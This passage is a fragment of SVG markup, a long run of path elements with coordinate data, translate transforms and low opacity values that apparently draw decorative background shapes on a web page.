d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path 